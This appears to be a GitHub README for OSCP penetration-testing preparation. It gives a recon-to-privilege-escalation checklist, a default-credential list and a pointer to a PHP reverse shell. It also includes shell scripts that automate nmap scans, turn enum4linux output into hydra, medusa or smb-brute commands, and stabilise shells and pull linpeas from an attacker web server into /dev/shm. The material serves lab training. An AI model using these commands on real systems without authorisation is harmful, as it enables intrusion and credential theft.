
cpt-jack-a-castle / oscp-prep-1


This project forked from ice-wzl/hacknetics


Contained is all my reference material for my OSCP preparation. Designed to be a one stop shop for code, guides, command syntax, and high level strategy. One simple clone and you have access to some of the most popular tools used for pentesting.

License: The Unlicense

Languages: Shell 39.06%, PowerShell 46.38%, PHP 5.68%, Batchfile 3.34%, Perl 2.67%, Python 2.47%, C 0.37%, VBScript 0.02%


OSCP-Prep

This repo is not complete yet; I am working on it daily.

Additional References

Step 1 Recon

  • Can you ping the target?
  • Is your VPN still connected?

Path

Start with the recon-enumeration folder

  • Start the scans: What is open?
  • Use autorecon 10.10.10.10 -v
  • Once autorecon completes, rescan with service detection and default scripts. nmap only scans its top 1000 ports unless you pass -p-, so "all ports" means: sudo nmap -sS -sV -sC -p- 10.10.10.10 | tee nmap_output.txt (-sS needs root)
  • Consider running targeted NSE scripts against the services found, e.g. for a web server on 8080:
nmap --script "http*" 10.10.10.10 -p 8080 -vv | tee nmap_http_scripts.txt
  • Identify the Ports and Services running.
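The recon steps above chain into each other: discover every open port first, then spend the slow -sV/-sC work only on those ports. The following script is an added example and is not part of this repo; it assumes nmap is on PATH, that the VPN interface is tun0, that the box is Linux (iputils ping flags), and that the service scan is run as root because -sS needs raw sockets. Only the command strings and the -oG parser are exercised without a target; the scans run when a target argument is given.

```shell
#!/bin/sh
# Added example (not from the repo): VPN/ping sanity checks, then a fast
# full-port discovery scan whose grepable output drives the service scan.
# Assumptions: nmap on PATH, VPN interface tun0, Linux ping, root for -sS.

# True if the VPN interface (assumed tun0) currently has an IPv4 address.
vpn_up() {
    ip -4 addr show dev tun0 2>/dev/null | grep -q 'inet '
}

# True if the target answers a single ICMP echo within 2 seconds.
host_pingable() {
    ping -c 1 -W 2 "$1" >/dev/null 2>&1
}

# Read nmap grepable (-oG) output on stdin and print the open TCP ports as a
# sorted, de-duplicated, comma-separated list such as "22,80,445".
# Filtered/closed entries never contain "/open/" and are therefore skipped.
open_ports_from_gnmap() {
    grep -o '[0-9]\{1,5\}/open/' | cut -d/ -f1 | sort -n -u | tr '\n' ',' | sed 's/,$//'
}

# Full 65535-port discovery, fast and without version probes. $2 is the -oA
# base name, so the parser later reads "$2.gnmap".
discovery_scan_cmd() {
    echo "nmap -p- --min-rate 1000 -T4 -oA $2 $1"
}

# Version detection plus default scripts, limited to the ports already found.
service_scan_cmd() {
    echo "nmap -sS -sV -sC -p $2 -oA service_scan $1"
}

# Map an nmap service name to the NSE script wildcard worth running next.
script_category_for_service() {
    case "$1" in
        http|https|http-proxy|ssl/http) echo 'http*' ;;
        microsoft-ds|netbios-ssn|smb)   echo 'smb*' ;;
        ftp)                            echo 'ftp*' ;;
        ssh)                            echo 'ssh*' ;;
        *)                              echo 'default' ;;
    esac
}

# Usage: sudo sh recon.sh 10.10.10.10   (nothing runs without a target)
main() {
    target=$1
    vpn_up || { echo 'tun0 has no address: reconnect the VPN first' >&2; exit 1; }
    host_pingable "$target" || echo 'no ICMP reply: host may drop ping, carrying on' >&2
    eval "$(discovery_scan_cmd "$target" discovery)"      # writes discovery.gnmap
    ports=$(open_ports_from_gnmap < discovery.gnmap)
    [ -n "$ports" ] || { echo 'no open TCP ports found' >&2; exit 1; }
    eval "$(service_scan_cmd "$target" "$ports")" | tee nmap_output.txt
}

if [ $# -gt 0 ]; then main "$@"; fi
```

The parser deliberately works on the -oG file rather than the human-readable output, because that format keeps every port of a host on one line and is stable across nmap versions.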

Web Server Running?

  • Go To: /web/web-servers.md
  • Find out CMS type and version --> check exploitdb
  • Look for usernames
  • Run nikto and gobuster to map out the website
  • robots.txt file?
  • Default Credentials (user:pass)
admin:admin
administrator:administrator
admin:administrator
admin:password
administrator:password
admin:admin123
admin:root123
admin:password1
admin:administrator1
admin:changeme1
admin:password123
admin:qwerty123
admin:administrator123
admin:changeme123

Upload Vulnerability PHP web shells

  • The best one for Linux and Windows
  • /shells/web-shells/php-reverse-shell/src/php_reverse_shell.php

FTP Running

  • Try anonymous login (user anonymous, any password)
  • If you can get a username from another port, try hydra
  • Make sure to connect to it as the root user from your local box
  • Remember the difference between Active and Passive mode

SSH/Telnet Running port 22, 23

  • Be on the lookout for LFI on a web server --> private keys (e.g. /home/<user>/.ssh/id_rsa)
  • Think about Hydra if you can find a username

Email Ports 25, 110, 143?

  • /recon-enumeration/recon-enumeration.md

NFS port 2049

  • /recon-enumeration/recon-enumeration.md
  • Check for shares that are accessible

NetBios or Microsoft-ds Running ports 137, 138, 139, 445

  • /recon-enumeration/recon-enumeration.md --> SMB Enumeration section
  • Use smbmap, nmap --script, enum4linux, smbclient, rpcclient
  • Check all enum4linux output especially toward the bottom for potential usernames
  • Can be brute-forced with hydra, medusa, or nmap --script smb-brute (mind the account lockout policy first)
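The usernames buried toward the bottom of enum4linux output are what feed the brute force, so it pays to extract them automatically rather than eyeball them. The following script is an added example and not part of this repo; the enum4linux lines it parses are constructed to match the real "user:[name] rid:[...]" and RID-cycling formats, and the hydra, medusa and nmap invocations use those tools' documented syntax. The rockyou.txt path is the usual Kali location and is an assumption.

```shell
#!/bin/sh
# Added example (not from the repo): turn enum4linux output into a user list
# and a brute-force command for hydra, medusa or nmap's smb-brute.

# Read enum4linux output on stdin; print unique usernames, one per line.
# Handles both the "Users on ..." section ("user:[jdoe] rid:[0x3e8]") and the
# RID-cycling section ("S-1-5-21-... DOMAIN\jdoe (Local User)").
# Machine accounts (trailing "$") are dropped: they are not worth spraying.
users_from_enum4linux() {
    awk '
        /^user:\[/ {
            s = $1; sub(/^user:\[/, "", s); sub(/\]$/, "", s); print s
        }
        /\((Local|Domain) User\)$/ {
            name = $2; sub(/^.*\\/, "", name); print name
        }
    ' | grep -v '\$$' | sort -u
}

# Build the brute-force command for whichever tool is at hand.
# $1 tool (hydra|medusa|nmap), $2 target, $3 user list file, $4 password file.
# Check the lockout threshold (enum4linux prints the password policy) before
# pointing any of these at a domain.
smb_bruteforce_cmd() {
    case "$1" in
        hydra)  echo "hydra -L $3 -P $4 smb://$2" ;;
        medusa) echo "medusa -h $2 -U $3 -P $4 -M smbnt" ;;
        nmap)   echo "nmap -p 445 --script smb-brute --script-args userdb=$3,passdb=$4 $2" ;;
        *)      echo "unknown tool: $1" >&2; return 1 ;;
    esac
}

# Usage: enum4linux -a 10.10.10.10 | tee enum4linux.txt
#        sh smbusers.sh 10.10.10.10 enum4linux.txt
main() {
    users_from_enum4linux < "$2" > users.txt
    echo "$(wc -l < users.txt) candidate users written to users.txt" >&2
    smb_bruteforce_cmd hydra "$1" users.txt /usr/share/wordlists/rockyou.txt
}

if [ $# -gt 1 ]; then main "$@"; fi
```

The same users.txt is reusable against SSH, FTP and web logins found on other ports, which is exactly the cross-service pivot the SSH and FTP sections above rely on.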

Redis port 6379

  • /recon-enumeration/recon-enumeration.md
  • Redis Section

Rsync port 873

  • /recon-enumeration/recon-enumeration.md
  • Rsync Section

On a Windows Box

  • /windows-priv-esc/win-priv-esc.md
  • Set up a secondary shell with msfvenom and multi/handler
  • Check for hidden files as well
  • Can you enable RDP? xfreerdp's /drive option shares a local Kali directory into the session, which makes moving tools onto the target trivial

On a Linux Box

  • /lin-priv-esc/lin-priv-esc.md
  • Set up a secondary shell with msfvenom and multi/handler
  • Always stabilize your shells!
  • Get lse.sh and linpeas.sh onto the box, into /dev/shm (tmpfs: world-writable and gone at reboot)
  • /lin-priv-esc/priv-esc-scripts/
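"Stabilize your shell" and "get linpeas into /dev/shm" both fail silently when the box lacks the tool you assumed (no python3, no curl). The following script is an added example and not part of this repo: it picks the pty-upgrade and transfer commands from what is actually installed and prints the attacker-side stty sequence sized to your own terminal. AVAILABLE_CMDS is an assumed override variable (space-separated tool names) so the selection logic can be exercised without a target; when it is unset the functions probe PATH with command -v. The attacker IP and http.server port in the usage comment are assumptions.

```shell
#!/bin/sh
# Added example (not from the repo): choose working shell-stabilisation and
# file-transfer commands for the target at hand instead of typing them blind.

# has_cmd NAME: true if NAME is usable. AVAILABLE_CMDS (assumed override, a
# space-separated list) replaces the PATH probe when it is set.
has_cmd() {
    if [ -n "${AVAILABLE_CMDS+x}" ]; then
        case " $AVAILABLE_CMDS " in *" $1 "*) return 0 ;; *) return 1 ;; esac
    fi
    command -v "$1" >/dev/null 2>&1
}

# Step 1 (on the target): spawn a pty. Prefer python3, then python2, then
# util-linux script. Prints nothing and returns 1 when none is present.
pty_upgrade_cmd() {
    if has_cmd python3; then
        echo "python3 -c 'import pty; pty.spawn(\"/bin/bash\")'"
    elif has_cmd python; then
        echo "python -c 'import pty; pty.spawn(\"/bin/bash\")'"
    elif has_cmd script; then
        echo 'script -qc /bin/bash /dev/null'
    else
        return 1
    fi
}

# Steps 2-4 (on the attacker, after Ctrl-Z backgrounds the reverse shell):
# raw mode so Ctrl-C reaches the target, foreground it, then size the remote
# pty like the local terminal. Falls back to 50x200 when there is no local tty.
attacker_side_cmds() {
    set -- $(stty size 2>/dev/null || echo '50 200')
    echo 'stty raw -echo; fg'
    echo "export TERM=xterm; stty rows $1 cols $2"
}

# Command to run on the target to fetch a privesc script into /dev/shm.
# $1 = URL on the attacker's web server, e.g. http://10.10.14.5/linpeas.sh,
# served from the priv-esc-scripts directory with: python3 -m http.server 80
fetch_to_shm_cmd() {
    name=${1##*/}
    if has_cmd curl; then
        echo "curl -s $1 -o /dev/shm/$name && chmod +x /dev/shm/$name"
    elif has_cmd wget; then
        echo "wget -q $1 -O /dev/shm/$name && chmod +x /dev/shm/$name"
    else
        return 1
    fi
}

# Usage (run on the target, paste the output lines in order):
#   sh stabilize.sh http://10.10.14.5/linpeas.sh
main() {
    pty_upgrade_cmd || echo 'no pty helper: try socat or a second channel' >&2
    echo '# now press Ctrl-Z and run locally:'
    attacker_side_cmds | sed 's/^/#   /'
    fetch_to_shm_cmd "$1" || echo 'no curl/wget: transfer via nc or base64 paste' >&2
}

if [ $# -gt 0 ]; then main "$@"; fi
```

Running it on the target with no arguments prints nothing; with the URL it emits the exact lines to paste, and the failure branches tell you which fallback to reach for before you waste time on a half-broken shell.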

Contributors

ice-wzl
